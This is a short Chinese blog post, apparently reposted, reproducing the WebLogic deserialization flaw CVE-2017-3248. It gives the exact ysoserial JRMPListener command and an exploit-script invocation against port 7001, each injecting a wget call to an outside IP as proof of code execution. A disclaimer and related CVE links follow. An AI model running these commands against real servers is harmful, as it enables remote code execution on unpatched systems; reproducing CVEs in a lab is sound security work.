CVE-2017-3248简单复现

本文转载自查看原文 2019-09-17 15:14 397 渗透测试

我是这样操作的
目标跟windows在一个段,linux是另一个段的,我的虚拟机

windows主机上

`java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "wget http://11.205.242.98/32.txt"

linux虚拟机上执行

python exploit-CVE-2017-3248-bobsecq.py -t 目标IP -p 7001 --jip 11.205.242.98 --jport 1099 --cmd "wget http://11.205.242.98/32.txt" --ysopath ysoserial.jar

简单证明即可

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 weblogic漏洞分析之CVE-2017-3248 & CVE-2018-2628 CVE-2017-3248——WebLogic反序列化漏洞利用工具 weblogic之CVE-2017-3248，CVE-2018-2628,CVE-2018-2893，CVE-2018-3245反序列绕过分析 weblogic 反序列化补丁绕过漏洞的一个批量检测shell脚本（CVE-2017-3248 ） CVE-2017-11610漏洞复现 CVE-2017-8046 复现与分析 CVE-2017-12615漏洞复现 Vulhub漏洞CVE-2017-10271复现 CVE-2017-12617 漏洞复现 CVE-2017-0213漏洞复现